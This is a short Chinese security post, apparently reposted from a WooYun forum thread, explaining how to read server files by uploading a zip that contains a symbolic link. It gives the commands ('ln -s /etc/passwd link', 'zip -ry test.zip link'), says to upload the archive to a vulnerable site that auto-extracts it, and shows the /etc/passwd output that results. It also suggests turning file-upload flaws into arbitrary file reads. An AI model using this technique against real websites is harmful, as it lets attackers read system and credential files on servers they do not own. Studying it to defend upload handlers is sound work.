技术 黑客
Facebook ...

http://zone.wooyun.org/content/17131

测试环境:centos 6.x
1)做软链接 ln -s /etc/passwd link 2)zip -ry test.zip link (保存软连接) 3)上传test.zip文件到存在问题的网站

原理分析:

服务端自动解压压缩文件,并返回文件内容的值,软链接链接的内容就是/etc/passwd

lrwxrwxrwx 1 xxx 11 Dec 8 04:18 link -> /etc/passwd
[xxx@default soft]$ cat link 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

知识点: 1)linux链接文件 2)压缩文件的时候保存软链接

思维发散,任意文件上传,不能解析脚本的漏洞是否可以升级为文件读取了呢?? php软链接漏洞参考 http://cxsecurity.com/issue/WLB-2009110068

"文章为作者独立观点, 不代表老订阅立场"

本站作者

每日荐书

在不完美的世界力求正常——读《公司的坏话》

书名:《公司的坏话》

作者:李天田(脱不花妹妹)

出版社:北京大学出版社

赞助商

广告